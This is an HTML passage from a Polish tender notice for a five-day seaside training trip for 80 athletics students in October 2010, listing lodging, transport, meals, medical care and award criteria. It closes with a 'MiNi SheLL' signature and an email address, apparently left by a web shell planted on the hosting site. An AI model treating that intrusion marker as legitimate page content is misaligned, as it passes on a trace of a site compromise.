6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla  opiekunów. 
6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Dzienna stawka żywieniowa - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie wycieczki szkoleniowej dla uczniów klas sportowych - grupa lekkoatletów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PRZEWIDYWANA ILOŚĆ UCZESTNIKÓW / TERMIN WYJAZDU
1.1. Przewidywana ilość uczestników  80 osób (młodzież osoby płatne) + 7 opiekunów (osoby  bezpłatne).
1.2. Wymagany termin pobytu od 04.10.2010 r. do 09.10.2010 r. (pobyt rozpoczyna się obiadem w dniu przyjazdu i kończy obiadem w dniu  wyjazdu). 
2. MIEJSCOWOŚĆ / ŚRODEK TRANSPORTU
2.1. Miejscowość:  nadmorska granicząca bezpośrednio z morzem
2.2. Środek transportu - kolej- bezwzględna rezerwacja wagonów zamykanych wyłącznie dla uczestnikó w obozu , autokar, bus.
	
3.OBIEKT / BAZA NOCLEGOWA / BAZA TRENINGOWA
3.1  Baza noclegowa - pokoje 2,3,4 osobowe. Zamawiający nie dopuszcza łóżek piętrowych.
3.2  Zakwaterowanie w jednym ośrodku wraz ze stołówką.
3.3  Osobne pokoje dla opiekunów ( osobno dla kobiet i osobno dla mężczyzn)
3.4  Pokoje wyposażone w pełen węzeł sanitarny.
3.5  Teren leśny( las, alejki o miękkim podłożu bez asfaltu) do 1 km od miejsca zakwaterowania. 
 3.6 Każdego dnia do dyspozycji uczestników sala gimnastyczna dostępna przez dwie godziny dziennie oraz pływalnia, sauna, kąpiele solankowe dostępne przez dwie godziny dziennie - zamiennie między 1000-1300 lub 1500-1800.(rano sala gimnastyczna, popołudniu pływalnia, sauna, kąpiele  solankowe lub na odwrót rano pływalnia, sauna, kąpiele solankowe a  popołudniu sala gimnastyczna).
	
4.OPIEKA MEDYCZNA
 4.1. Lekarz dochodzący (na wezwanie).
 4.2. Izolatka dla chorych.
 4.3. Zapewnienie leków pierwszej pomocy.

5.WYŻYWIENIE
5.1 Trzy posiłki dziennie z podwieczorkiem /śniadanie, obiad,  kolacja/.
5.2.Suchy prowiant na podróż, sok
5.3. Codziennie 0,5 l wody mineralnej niegazowanej (? ilość butelek wody nisko zmineralizowanej i ? ilość butelek wody wysoko zmineralizowanej) dla każdego uczestnika obozu.


6.W RAMACH REALIZACJI PRZEDMIOTU ZAMÓWIENIA WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
 6.1. Zapewnienia bezpłatnego pobytu i przejazdu dla opiekunów. 
 6.2. Ubezpieczenie uczestników w czasie podróży i pobytu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.24.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Atrakcyjność obiektu - 5</li>
<li>3. Dzienna stawka żywieniowa - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com